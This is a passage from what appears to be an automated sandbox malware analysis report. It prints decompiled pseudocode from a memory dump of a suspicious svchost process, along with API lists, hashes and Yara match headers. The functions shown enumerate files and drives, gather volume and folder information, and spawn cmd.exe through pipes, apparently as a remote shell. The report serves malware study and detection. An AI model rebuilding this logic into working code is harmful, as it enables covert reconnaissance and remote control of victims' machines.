                                                            				long long _t146;
                                                            				intOrPtr _t147;
                                                            				void* _t148;
                                                            				intOrPtr _t150;
                                                            				long long _t151;
                                                            				intOrPtr _t152;
                                                            				signed long long _t155;
                                                            				signed long long _t158;
                                                            				intOrPtr _t161;
                                                            				intOrPtr _t176;
                                                            				void* _t177;
                                                            				long long _t187;
                                                            				intOrPtr _t199;
                                                            				intOrPtr* _t210;
                                                            				long long _t211;
                                                            				intOrPtr _t212;
                                                            				intOrPtr _t214;
                                                            				void* _t215;
                                                            				void* _t216;
                                                            				signed long long _t217;
                                                            				void* _t219;
                                                            				intOrPtr _t226;
                                                            
                                                            				_t155 = __rbx;
                                                            				_t215 = _t216 - 0x9f0;
                                                            				_t217 = _t216 - 0xaf0;
                                                            				_t141 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t215 + 0x9e0) = _t141 ^ _t217;
                                                            				_t210 = __rdx;
                                                            				 *((long long*)(_t217 + 0x38)) = __rcx;
                                                            				_t211 = __rcx;
                                                            				r8d = 0x410;
                                                            				E0000022B22BAF563830(_t108, 0, _t111, _t112, _t215 + 0x5d0, __rdx, __rdx, _t219);
                                                            				lstrlenW(??);
                                                            				_t144 =  ==  ? 0xaf586058 : 0xaf587858;
                                                            				 *((long long*)(_t217 + 0x40)) = 0xaf587858;
                                                            				wsprintfW(??, ??);
                                                            				FindFirstFileW(??, ??);
                                                            				 *((long long*)(_t217 + 0x48)) = 0xaf587858;
                                                            				_t114 = ( ==  ? 0xaf586058 : 0xaf587858) - 0xffffffff;
                                                            				if (( ==  ? 0xaf586058 : 0xaf587858) != 0xffffffff) goto 0xaf535eda;
                                                            				goto 0xaf5361bf;
                                                            				 *((long long*)(_t217 + 0xb20)) = __rbx;
                                                            				 *(_t217 + 0x30) = 1;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t109 =  *(_t215 - 0x64) & 0x0000ffff;
                                                            				_t115 = _t109 - "."; // 0x2e
                                                            				_t88 =  *(_t215 - 0x62) & 0x0000ffff;
                                                            				if (_t115 != 0) goto 0xaf535f0e;
                                                            				if (_t88 ==  *0xaf587872) goto 0xaf536083;
                                                            				_t117 = _t109 - L".."; // 0x2e
                                                            				if (_t117 != 0) goto 0xaf535f31;
                                                            				if (_t88 !=  *0xaf587876) goto 0xaf535f31;
                                                            				if (( *(_t215 - 0x60) & 0x0000ffff) ==  *0xaf587878) goto 0xaf536083;
                                                            				 *((long long*)(_t217 + 0x20)) = _t215 - 0x64;
                                                            				 *(_t217 + 0x30) = 0;
                                                            				if (( *(_t217 + 0x70) & 0x00000010) == 0) goto 0xaf535f75;
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF535E30(__rbx, _t211, _t215 + 0x1c0);
                                                            				goto 0xaf536083;
                                                            				wsprintfW(??, ??);
                                                            				 *((long long*)(_t217 + 0x68)) = 7;
                                                            				 *(_t217 + 0x60) = _t155;
                                                            				 *((short*)(_t217 + 0x50)) = 0;
                                                            				if ( *((intOrPtr*)(_t215 + 0x1c0)) != 0) goto 0xaf535f9c;
                                                            				goto 0xaf535fba;
                                                            				_t146 = _t215 + 0x1c0;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if ( *((intOrPtr*)(_t146 + ((_t155 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf535fb0;
                                                            				E0000022B22BAF533B50(_t155, _t217 + 0x50, _t215 + 0x1c0, _t211, (_t155 | 0xffffffff) + 1);
                                                            				_t212 =  *((intOrPtr*)(_t211 + 0x18));
                                                            				E0000022B22BAF536940(_t109, _t146, _t155, _t217 + 0x50, _t212, _t212, _t217 + 0x50);
                                                            				_t226 =  *((intOrPtr*)(_t217 + 0x38));
                                                            				_t199 =  *((intOrPtr*)(_t226 + 0x20));
                                                            				if (0x55555554 - _t199 - 1 < 0) goto 0xaf536211;
                                                            				 *((long long*)(_t226 + 0x20)) = _t199 + 1;
                                                            				 *((long long*)(_t212 + 8)) = _t146;
                                                            				 *((long long*)( *((intOrPtr*)(_t146 + 8)))) = _t146;
                                                            				_t147 =  *((intOrPtr*)(_t217 + 0x68));
                                                            				if (_t147 - 8 < 0) goto 0xaf536080;
                                                            				_t176 =  *((intOrPtr*)(_t217 + 0x50));
                                                            				_t148 = _t147 + 1;
                                                            				if (_t148 - 0xffffffff > 0) goto 0xaf5361fe;
                                                            				if (_t148 + _t148 - 0x1000 < 0) goto 0xaf536074;
                                                            				if ((_t109 & 0x0000001f) != 0) goto 0xaf5361f8;
                                                            				_t150 =  *((intOrPtr*)(_t176 - 8));
                                                            				if (_t150 - _t176 >= 0) goto 0xaf5361f2;
                                                            				_t177 = _t176 - _t150;
                                                            				if (_t177 - 8 < 0) goto 0xaf5361ec;
                                                            				if (_t177 - 0x27 > 0) goto 0xaf5361e6;
                                                            				0xaf55a85c();
                                                            				goto 0xaf536083;
                                                            				_t214 = _t226;
                                                            				if (FindNextFileW(??, ??) != 0) goto 0xaf535ef0;
                                                            				FindClose(??);
                                                            				if (( *(_t217 + 0x30) & 0x000000ff) == 0) goto 0xaf5361b5;
                                                            				_t98 = lstrlenW(??);
                                                            				 *((long long*)(_t217 + 0x68)) = 7;
                                                            				 *(_t217 + 0x60) = _t155;
                                                            				 *((short*)(_t217 + 0x50)) = 0;
                                                            				if ( *((short*)(_t210 + _t98 * 2 - 2)) != 0x5c) goto 0xaf536131;
                                                            				if ( *_t210 == 0) goto 0xaf5360ed;
                                                            				if ( *((short*)(_t210 + ((_t155 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf5360e3;
                                                            				E0000022B22BAF533B50((_t155 | 0xffffffff) + 1, _t217 + 0x50, _t210, _t214, (_t155 | 0xffffffff) + 1);
                                                            				_t158 =  *((intOrPtr*)(_t214 + 0x18));
                                                            				E0000022B22BAF536940(_t109, _t150, _t158, _t217 + 0x50, _t158, _t214, _t217 + 0x50);
                                                            				_t151 =  *((intOrPtr*)(_t214 + 0x20));
                                                            				if (0x55555554 - _t151 - 1 >= 0) goto 0xaf536199;
                                                            				goto 0xaf5361d9;
                                                            				if ( *_t210 == 0) goto 0xaf53614a;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t160 = (_t158 | 0xffffffff) + 1;
                                                            				if ( *((short*)(_t210 + ((_t158 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf536140;
                                                            				E0000022B22BAF533B50((_t158 | 0xffffffff) + 1, _t217 + 0x50, _t210, _t214, (_t158 | 0xffffffff) + 1);
                                                            				r8d = 1;
                                                            				E0000022B22BAF536690((_t158 | 0xffffffff) + 1, _t217 + 0x50, _t214, _t215, _t160);
                                                            				_t161 =  *((intOrPtr*)(_t214 + 0x18));
                                                            				E0000022B22BAF536940(_t109, _t151, _t161, _t217 + 0x50, _t161, _t214, _t217 + 0x50);
                                                            				_t187 = _t151;
                                                            				_t152 =  *((intOrPtr*)(_t214 + 0x20));
                                                            				if (0x55555554 - _t152 - 1 < 0) goto 0xaf536204;
                                                            				 *((long long*)(_t214 + 0x20)) = _t152 + 1;
                                                            				 *((long long*)(_t161 + 8)) = _t187;
                                                            				 *((long long*)( *((intOrPtr*)(_t187 + 8)))) = _t187;
                                                            				E0000022B22BAF5339E0(_t109, _t217 + 0x50);
                                                            				return E0000022B22BAF55A7C0(_t109,  *((intOrPtr*)(_t187 + 8)),  *(_t215 + 0x9e0) ^ _t217);
                                                            			}





































                                                            0x22baf535e30
                                                            0x22baf535e34
                                                            0x22baf535e3c
                                                            0x22baf535e43
                                                            0x22baf535e4d
                                                            0x22baf535e54
                                                            0x22baf535e57
                                                            0x22baf535e5c
                                                            0x22baf535e68
                                                            0x22baf535e6e
                                                            0x22baf535e76
                                                            0x22baf535e9d
                                                            0x22baf535eab
                                                            0x22baf535eb0
                                                            0x22baf535ec2
                                                            0x22baf535ec8
                                                            0x22baf535ecd
                                                            0x22baf535ed1
                                                            0x22baf535ed5
                                                            0x22baf535edc
                                                            0x22baf535ee4
                                                            0x22baf535eea
                                                            0x22baf535ef0
                                                            0x22baf535ef4
                                                            0x22baf535efb
                                                            0x22baf535eff
                                                            0x22baf535f08
                                                            0x22baf535f0e
                                                            0x22baf535f15
                                                            0x22baf535f1e
                                                            0x22baf535f2b
                                                            0x22baf535f46
                                                            0x22baf535f52
                                                            0x22baf535f59
                                                            0x22baf535f5b
                                                            0x22baf535f6b
                                                            0x22baf535f70
                                                            0x22baf535f75
                                                            0x22baf535f7b
                                                            0x22baf535f84
                                                            0x22baf535f89
                                                            0x22baf535f95
                                                            0x22baf535f9a
                                                            0x22baf535f9c
                                                            0x22baf535fa7
                                                            0x22baf535fb8
                                                            0x22baf535fc6
                                                            0x22baf535fcb
                                                            0x22baf535fdb
                                                            0x22baf535fe0
                                                            0x22baf535fef
                                                            0x22baf535ffa
                                                            0x22baf536004
                                                            0x22baf536008
                                                            0x22baf536010
                                                            0x22baf536013
                                                            0x22baf53601c
                                                            0x22baf53601e
                                                            0x22baf536023
                                                            0x22baf536033
                                                            0x22baf536042
                                                            0x22baf536047
                                                            0x22baf53604d
                                                            0x22baf536054
                                                            0x22baf53605a
                                                            0x22baf536061
                                                            0x22baf53606b
                                                            0x22baf536074
                                                            0x22baf53607e
                                                            0x22baf536080
                                                            0x22baf536095
                                                            0x22baf5360a0
                                                            0x22baf5360ad
                                                            0x22baf5360b6
                                                            0x22baf5360bf
                                                            0x22baf5360c8
                                                            0x22baf5360cd
                                                            0x22baf5360d8
                                                            0x22baf5360dd
                                                            0x22baf5360eb
                                                            0x22baf5360f8
                                                            0x22baf5360fd
                                                            0x22baf53610d
                                                            0x22baf53611f
                                                            0x22baf53612a
                                                            0x22baf53612c
                                                            0x22baf536134
                                                            0x22baf53613a
                                                            0x22baf536140
                                                            0x22baf536148
                                                            0x22baf536155
                                                            0x22baf53615a
                                                            0x22baf536165
                                                            0x22baf53616a
                                                            0x22baf53617a
                                                            0x22baf53617f
                                                            0x22baf53618c
                                                            0x22baf536197
                                                            0x22baf53619c
                                                            0x22baf5361a0
                                                            0x22baf5361a8
                                                            0x22baf5361b0
                                                            0x22baf5361d8

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFindFirstlstrlenwsprintf
                                                            • String ID: %s%s%s$%s%s*.*$l$list<T> too long
                                                            • API String ID: 4287520746-3350904371
                                                            • Opcode ID: cb5006bc32967d63480be752ba00a68ad03439baceba1ad33795331473b04774
                                                            • Instruction ID: 16680c5fc86d06e3e218184be5409a5f4ea30cd7a68550a896669b96a23b9703
                                                            • Opcode Fuzzy Hash: cb5006bc32967d63480be752ba00a68ad03439baceba1ad33795331473b04774
                                                            • Instruction Fuzzy Hash: 81C16033204A85A1EA329B99E46C3EE77A0F745794F444215DBAE07BEBEF7AC045C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 44%
                                                            			E0000022B22BAF535280(void* __edi, long long __rbx, long long __rcx, long long __rsi, void* __r9, long long __r12) {
                                                            				void* __rdi;
                                                            				int _t105;
                                                            				void* _t137;
                                                            				void* _t139;
                                                            				signed long long _t147;
                                                            				signed long long _t148;
                                                            				signed long long _t149;
                                                            				signed short* _t163;
                                                            				WCHAR* _t193;
                                                            				signed short* _t194;
                                                            				unsigned long long _t200;
                                                            				WCHAR* _t202;
                                                            				void* _t203;
                                                            				void* _t205;
                                                            				signed long long _t206;
                                                            				void* _t208;
                                                            				void* _t216;
                                                            				WCHAR* _t220;
                                                            				long _t224;
                                                            				int _t228;
                                                            				signed long long _t229;
                                                            
                                                            				_t216 = __r9;
                                                            				_t135 = __edi;
                                                            				 *((long long*)(_t205 + 0x18)) = __rbx;
                                                            				 *((long long*)(_t205 + 0x20)) = __rsi;
                                                            				_t203 = _t205 - 0xa50;
                                                            				_t206 = _t205 - 0xb50;
                                                            				_t147 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t148 = _t147 ^ _t206;
                                                            				 *(_t203 + 0xa40) = _t148;
                                                            				 *((long long*)(_t206 + 0x50)) = __rcx;
                                                            				LocalAlloc(_t228);
                                                            				_t229 = _t148;
                                                            				 *_t148 = 0x68;
                                                            				GetLogicalDriveStringsW(_t224);
                                                            				r14d = 0;
                                                            				_t194 = _t203 + 0x630;
                                                            				 *(_t206 + 0x40) = _t224;
                                                            				 *(_t206 + 0x48) = _t224;
                                                            				_t10 = _t224 + 1; // 0x1
                                                            				if ( *((intOrPtr*)(_t203 + 0x630)) == r14w) goto 0xaf535464;
                                                            				 *((long long*)(_t206 + 0xb88)) = __r12;
                                                            				r8d = 0x410;
                                                            				E0000022B22BAF563830(0x208, 0, __edi, _t139, _t203 + 0x220, _t203 + 0x630, _t194, _t208);
                                                            				 *((intOrPtr*)(_t206 + 0x38)) = 0x208;
                                                            				_t149 = _t203 + 0x220;
                                                            				 *(_t206 + 0x30) = _t149;
                                                            				r9d = 0;
                                                            				 *(_t206 + 0x28) = _t224;
                                                            				r8d = 0;
                                                            				 *(_t206 + 0x20) = _t224;
                                                            				GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??);
                                                            				r9d = 0x2b8;
                                                            				 *(_t206 + 0x20) = 0x410;
                                                            				SHGetFileInfoW(??, ??, ??, ??, ??);
                                                            				lstrlenW(_t220);
                                                            				r12d = 2 + _t149 * 2;
                                                            				lstrlenW(_t193);
                                                            				r13d = 2 + _t149 * 2;
                                                            				if (( *_t194 & 0x0000ffff) - 0x41 - 1 <= 0) goto 0xaf5353d9;
                                                            				r9d = 0;
                                                            				if (GetDiskFreeSpaceExW(??, ??, ??, ??) == 0) goto 0xaf5353d9;
                                                            				_t200 =  *(_t206 + 0x40) >> 0x14;
                                                            				goto 0xaf5353dc;
                                                            				 *((short*)(_t194 + _t229)) =  *_t194 & 0x0000ffff;
                                                            				 *((char*)(__rbx + _t229)) = GetDriveTypeW(_t202);
                                                            				 *((intOrPtr*)(__rbx + _t229)) = r14d;
                                                            				 *((intOrPtr*)(__rbx + _t229)) = r14d;
                                                            				E0000022B22BAF562BA0(_t10 + 0xe, __edi, r14d, _t139, _t194 + _t229, _t203 + 0x178, _t194, _t200, r12d);
                                                            				E0000022B22BAF562BA0(_t10 + 0xe + r12d, __edi, r14d, _t139, _t194 + _t229 + _t229, _t203 + 0x220, _t194, _t200, r13d);
                                                            				_t163 = _t194;
                                                            				lstrlenW(??);
                                                            				r14d = 0;
                                                            				if (_t194[_t149] != 0) goto 0xaf535310;
                                                            				r9d = 0;
                                                            				_t44 =  &(_t163[8]); // 0x10
                                                            				r8d = _t44;
                                                            				 *((short*)(_t149 + _t229)) = 0;
                                                            				__imp__SHGetSpecialFolderPathW();
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t10 + 0xe + r12d + r13d + 2, __edi, r14d, _t139, _t203 + 0x220 + _t229, _t203 + 0x220,  &(_t194[_t149]), _t200, 2 + _t149 * 2);
                                                            				lstrlenW(??);
                                                            				r9d = 0;
                                                            				_t54 = _t216 + 5; // 0x5
                                                            				r8d = _t54;
                                                            				__imp__SHGetSpecialFolderPathW();
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(__rbx + _t149 * 2 + 2, __edi, r14d, _t139, _t203 + 0x220 + _t229, _t203 + 0x220,  &(_t194[_t149]), _t200, 2 + _t149 * 2);
                                                            				lstrlenW(??);
                                                            				_t137 = __rbx + _t149 * 2;
                                                            				E0000022B22BAF5350A0();
                                                            				if (_t149 == 0) goto 0xaf535583;
                                                            				LocalSize(??);
                                                            				LocalSize(??);
                                                            				if (_t149 + _t200 - _t149 <= 0) goto 0xaf535557;
                                                            				LocalSize(??);
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				LocalSize(??);
                                                            				E0000022B22BAF562BA0(__rbx + _t149 * 2 + 2, _t135, _t137, _t139, _t200 + _t149, _t149, _t149, _t200, _t149);
                                                            				_t105 = LocalSize(??);
                                                            				LocalFree(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t137 + _t105;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)( *((intOrPtr*)(_t206 + 0x50)) + 8)), _t149);
                                                            				LocalFree(??);
                                                            				return E0000022B22BAF55A7C0(__rbx + _t149 * 2 + 2, _t149,  *(_t203 + 0xa40) ^ _t206);
                                                            			}
























                                                            0x22baf535280
                                                            0x22baf535280
                                                            0x22baf535280
                                                            0x22baf535285
                                                            0x22baf535292
                                                            0x22baf53529a
                                                            0x22baf5352a1
                                                            0x22baf5352a8
                                                            0x22baf5352ab
                                                            0x22baf5352b5
                                                            0x22baf5352c4
                                                            0x22baf5352d6
                                                            0x22baf5352d9
                                                            0x22baf5352dc
                                                            0x22baf5352e2
                                                            0x22baf5352e5
                                                            0x22baf5352ec
                                                            0x22baf5352f1
                                                            0x22baf5352f6
                                                            0x22baf535302
                                                            0x22baf535308
                                                            0x22baf535319
                                                            0x22baf53531f
                                                            0x22baf535324
                                                            0x22baf53532c
                                                            0x22baf535333
                                                            0x22baf535338
                                                            0x22baf53533b
                                                            0x22baf535340
                                                            0x22baf535345
                                                            0x22baf53534d
                                                            0x22baf535353
                                                            0x22baf535359
                                                            0x22baf53536e
                                                            0x22baf53537b
                                                            0x22baf535388
                                                            0x22baf535390
                                                            0x22baf535396
                                                            0x22baf5353a9
                                                            0x22baf5353ab
                                                            0x22baf5353c3
                                                            0x22baf5353cf
                                                            0x22baf5353d7
                                                            0x22baf5353e4
                                                            0x22baf5353fc
                                                            0x22baf535403
                                                            0x22baf53540a
                                                            0x22baf535416
                                                            0x22baf53542d
                                                            0x22baf535432
                                                            0x22baf535438
                                                            0x22baf535440
                                                            0x22baf535451
                                                            0x22baf535468
                                                            0x22baf535475
                                                            0x22baf535475
                                                            0x22baf535479
                                                            0x22baf53547e
                                                            0x22baf53548b
                                                            0x22baf5354a7
                                                            0x22baf5354b3
                                                            0x22baf5354b9
                                                            0x22baf5354c8
                                                            0x22baf5354c8
                                                            0x22baf5354cf
                                                            0x22baf5354dc
                                                            0x22baf5354f8
                                                            0x22baf535504
                                                            0x22baf53550d
                                                            0x22baf535510
                                                            0x22baf53551b
                                                            0x22baf535520
                                                            0x22baf53552d
                                                            0x22baf535536
                                                            0x22baf53553b
                                                            0x22baf535541
                                                            0x22baf53554e
                                                            0x22baf53555a
                                                            0x22baf53556a
                                                            0x22baf535572
                                                            0x22baf53557d
                                                            0x22baf535587
                                                            0x22baf53558a
                                                            0x22baf535590
                                                            0x22baf53559a
                                                            0x22baf5355cc

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$lstrlen$Size$Free$AllocDriveFolderPathSpecial$DiskFileInfoInformationLogicalSpaceStringsTypeVolume
                                                            • String ID:
                                                            • API String ID: 4186219405-0
                                                            • Opcode ID: ab48fd9bffc54164dd25080b0ed543683e0287214035ea578af6fd1b64da1c0b
                                                            • Instruction ID: 1bcd3786420208402ce04b02540f4a18de1acde09a49fad99d707a7b027a8ccf
                                                            • Opcode Fuzzy Hash: ab48fd9bffc54164dd25080b0ed543683e0287214035ea578af6fd1b64da1c0b
                                                            • Instruction Fuzzy Hash: 13916473210A85A6EF31DFA5E89C7ED73A1F788B88F804415DA4A47B5ADF3AC509C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0000022B22BAF546DD0(long long __rbx, long long __rcx, long long __rdx, long long __rsi, void* __r9) {
                                                            				void* __rdi;
                                                            				void* _t109;
                                                            				void* _t110;
                                                            				signed long long _t119;
                                                            				long long _t124;
                                                            				long long _t128;
                                                            				long long _t131;
                                                            				HANDLE* _t160;
                                                            				void* _t164;
                                                            				void* _t165;
                                                            				void* _t167;
                                                            				signed long long _t168;
                                                            				void* _t170;
                                                            				HANDLE* _t179;
                                                            				int _t181;
                                                            				struct _SECURITY_ATTRIBUTES* _t183;
                                                            
                                                            				 *((long long*)(_t167 + 0x10)) = __rbx;
                                                            				 *((long long*)(_t167 + 0x18)) = __rsi;
                                                            				_t165 = _t167 - 0x220;
                                                            				_t168 = _t167 - 0x320;
                                                            				_t119 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *(_t165 + 0x210) = _t119 ^ _t168;
                                                            				 *((long long*)(__rcx + 8)) = __rdx;
                                                            				 *((long long*)(__rcx)) = 0xaf588cf8;
                                                            				r9d = 0;
                                                            				 *((long long*)(__rdx + 0x68)) = __rcx;
                                                            				_t131 = __rcx;
                                                            				r8d = 0;
                                                            				CreateEventW(_t183, _t181);
                                                            				 *((long long*)(__rcx + 0x10)) = 0xaf588cf8;
                                                            				r12d = 0;
                                                            				 *((intOrPtr*)(_t165 - 0x70)) = r12d;
                                                            				 *((long long*)(__rcx)) = 0xaf589480;
                                                            				 *((long long*)(_t165 - 0x80)) = 0xaf589480;
                                                            				r8d = L"%04d-%02d-%02d  %02d:%02d";
                                                            				E0000022B22BAF563830(0, 0, _t109, _t110, _t165 - 0x68, __rdx, _t160, _t170);
                                                            				 *(_t168 + 0x58) = _t179;
                                                            				 *((long long*)(_t168 + 0x60)) = 0xaf589480;
                                                            				r8d = 0x208;
                                                            				 *((long long*)(_t168 + 0x68)) = 0xaf589480;
                                                            				E0000022B22BAF563830(0, 0, _t109, _t110, _t165, __rdx, _t160, _t170);
                                                            				r9d = 0;
                                                            				 *(_t131 + 0x18) = _t179;
                                                            				 *(_t131 + 0x20) = _t179;
                                                            				 *(_t131 + 0x28) = _t179;
                                                            				 *(_t131 + 0x30) = _t179;
                                                            				 *((intOrPtr*)(_t168 + 0x70)) = 0x18;
                                                            				 *(_t168 + 0x78) = _t179;
                                                            				 *((intOrPtr*)(_t165 - 0x80)) = 1;
                                                            				if (CreatePipe(_t179, _t160) != 0) goto 0xaf546eda;
                                                            				if ( *(_t131 + 0x18) == 0) goto 0xaf546ec2;
                                                            				CloseHandle(_t164);
                                                            				if ( *(_t131 + 0x30) == 0) goto 0xaf54706f;
                                                            				CloseHandle(??);
                                                            				goto 0xaf54706f;
                                                            				r9d = 0;
                                                            				_t157 = _t131 + 0x20;
                                                            				if (CreatePipe(??, ??, ??, ??) != 0) goto 0xaf546f1b;
                                                            				if ( *(_t131 + 0x20) == 0) goto 0xaf546f03;
                                                            				CloseHandle(??);
                                                            				if ( *(_t131 + 0x28) == 0) goto 0xaf54706f;
                                                            				CloseHandle(??);
                                                            				goto 0xaf54706f;
                                                            				_t34 = _t157 + 0x68; // 0x68
                                                            				r8d = _t34;
                                                            				E0000022B22BAF563830(0, 0, _t109, _t110, _t165 - 0x70, _t131 + 0x20, _t160, _t168 + 0x70);
                                                            				 *(_t168 + 0x58) = 0xaf589480;
                                                            				 *((long long*)(_t168 + 0x60)) = 0xaf589480;
                                                            				 *((long long*)(_t168 + 0x68)) = 0xaf589480;
                                                            				GetStartupInfoW(??);
                                                            				 *((long long*)(_t165 - 0x20)) =  *(_t131 + 0x28);
                                                            				_t124 =  *(_t131 + 0x30);
                                                            				 *((long long*)(_t165 - 0x10)) = _t124;
                                                            				 *((long long*)(_t165 - 0x18)) = _t124;
                                                            				 *((intOrPtr*)(_t165 - 0x70)) = 0x68;
                                                            				 *((intOrPtr*)(_t165 - 0x30)) = r12w;
                                                            				 *((intOrPtr*)(_t165 - 0x34)) = 0x101;
                                                            				GetSystemDirectoryW(??, ??);
                                                            				lstrcatW(??, ??);
                                                            				r9d = 0;
                                                            				 *((long long*)(_t168 + 0x48)) = _t168 + 0x58;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t168 + 0x40)) = _t165 - 0x70;
                                                            				 *(_t168 + 0x38) = _t179;
                                                            				 *(_t168 + 0x30) = _t179;
                                                            				 *((intOrPtr*)(_t168 + 0x28)) = 0x20;
                                                            				 *((intOrPtr*)(_t168 + 0x20)) = 1;
                                                            				if (CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf546ff9;
                                                            				CloseHandle(??);
                                                            				CloseHandle(??);
                                                            				CloseHandle(??);
                                                            				CloseHandle(??);
                                                            				goto 0xaf54706f;
                                                            				r9b = 0x3f;
                                                            				 *((long long*)(_t131 + 0x38)) =  *(_t168 + 0x58);
                                                            				r8d = 1;
                                                            				_t128 =  *((intOrPtr*)(_t168 + 0x60));
                                                            				 *((long long*)(_t131 + 0x40)) = _t128;
                                                            				 *((char*)(_t168 + 0x50)) = 0x85;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t131 + 8)), _t168 + 0x50);
                                                            				WaitForSingleObject(??, ??);
                                                            				Sleep(??);
                                                            				 *(_t168 + 0x30) = r12b;
                                                            				E0000022B22BAF548B70(_t128, 0xaf5472e0, _t131);
                                                            				 *((long long*)(_t131 + 0x48)) = _t128;
                                                            				 *(_t168 + 0x30) = r12b;
                                                            				E0000022B22BAF548B70(_t128, 0xaf547470, _t131);
                                                            				 *((long long*)(_t131 + 0x50)) = _t128;
                                                            				return E0000022B22BAF55A7C0(0x96, _t131,  *(_t165 + 0x210) ^ _t168);
                                                            			}



















                                                            0x22baf546dd0
                                                            0x22baf546dd5
                                                            0x22baf546de2
                                                            0x22baf546dea
                                                            0x22baf546df1
                                                            0x22baf546dfb
                                                            0x22baf546e02
                                                            0x22baf546e0d
                                                            0x22baf546e10
                                                            0x22baf546e13
                                                            0x22baf546e17
                                                            0x22baf546e1a
                                                            0x22baf546e23
                                                            0x22baf546e29
                                                            0x22baf546e2d
                                                            0x22baf546e34
                                                            0x22baf546e41
                                                            0x22baf546e46
                                                            0x22baf546e4a
                                                            0x22baf546e4e
                                                            0x22baf546e55
                                                            0x22baf546e5c
                                                            0x22baf546e61
                                                            0x22baf546e67
                                                            0x22baf546e70
                                                            0x22baf546e75
                                                            0x22baf546e78
                                                            0x22baf546e81
                                                            0x22baf546e89
                                                            0x22baf546e91
                                                            0x22baf546e95
                                                            0x22baf546e9d
                                                            0x22baf546ea2
                                                            0x22baf546eb1
                                                            0x22baf546eba
                                                            0x22baf546ebc
                                                            0x22baf546ec9
                                                            0x22baf546ecf
                                                            0x22baf546ed5
                                                            0x22baf546eda
                                                            0x22baf546ee2
                                                            0x22baf546ef2
                                                            0x22baf546efb
                                                            0x22baf546efd
                                                            0x22baf546f0a
                                                            0x22baf546f10
                                                            0x22baf546f16
                                                            0x22baf546f21
                                                            0x22baf546f21
                                                            0x22baf546f25
                                                            0x22baf546f30
                                                            0x22baf546f35
                                                            0x22baf546f3a
                                                            0x22baf546f3f
                                                            0x22baf546f4d
                                                            0x22baf546f56
                                                            0x22baf546f5a
                                                            0x22baf546f5e
                                                            0x22baf546f62
                                                            0x22baf546f69
                                                            0x22baf546f6e
                                                            0x22baf546f75
                                                            0x22baf546f86
                                                            0x22baf546f91
                                                            0x22baf546f94
                                                            0x22baf546fa1
                                                            0x22baf546fa4
                                                            0x22baf546fab
                                                            0x22baf546fb0
                                                            0x22baf546fb5
                                                            0x22baf546fbd
                                                            0x22baf546fcd
                                                            0x22baf546fd3
                                                            0x22baf546fdd
                                                            0x22baf546fe7
                                                            0x22baf546ff1
                                                            0x22baf546ff7
                                                            0x22baf547007
                                                            0x22baf54700a
                                                            0x22baf54700e
                                                            0x22baf547014
                                                            0x22baf547019
                                                            0x22baf54701d
                                                            0x22baf547022
                                                            0x22baf54702e
                                                            0x22baf547039
                                                            0x22baf547042
                                                            0x22baf54704e
                                                            0x22baf547056
                                                            0x22baf547061
                                                            0x22baf547066
                                                            0x22baf54706b
                                                            0x22baf54709c

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoObjectProcessSingleSleepStartupSystemWaitlstrcat
                                                            • String ID: $\cmd.exe
                                                            • API String ID: 3838570663-3339350558
                                                            • Opcode ID: 83e81d93035937cea476c7aaffe6999df18068edc36231145744d86170da8540
                                                            • Instruction ID: 5c8a653a58802fa4a8436363641d90a8125f7166db583317100f6a45abae561d
                                                            • Opcode Fuzzy Hash: 83e81d93035937cea476c7aaffe6999df18068edc36231145744d86170da8540
                                                            • Instruction Fuzzy Hash: D5815833611B84A6EB61CFA1E85C6CE77B4FB88B48F500125DA8D43B6ADF3AC555C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 15%
                                                            			E0000022B22BAF545190(void* __ecx, intOrPtr __edx, void* __eflags, long long __rbx, long long* __rcx, long long __rsi) {
                                                            				void* __rdi;
                                                            				void* _t153;
                                                            				signed long long _t157;
                                                            				void* _t194;
                                                            				long long* _t197;
                                                            				signed int _t199;
                                                            				void* _t201;
                                                            				signed long long _t202;
                                                            
                                                            				_t162 = __rbx;
                                                            				_t153 = __eflags;
                                                            				 *((long long*)(_t201 + 0x10)) = __rbx;
                                                            				 *(_t201 + 0x18) = _t199;
                                                            				 *((long long*)(_t201 + 0x20)) = __rsi;
                                                            				_t202 = _t201 - 0x190;
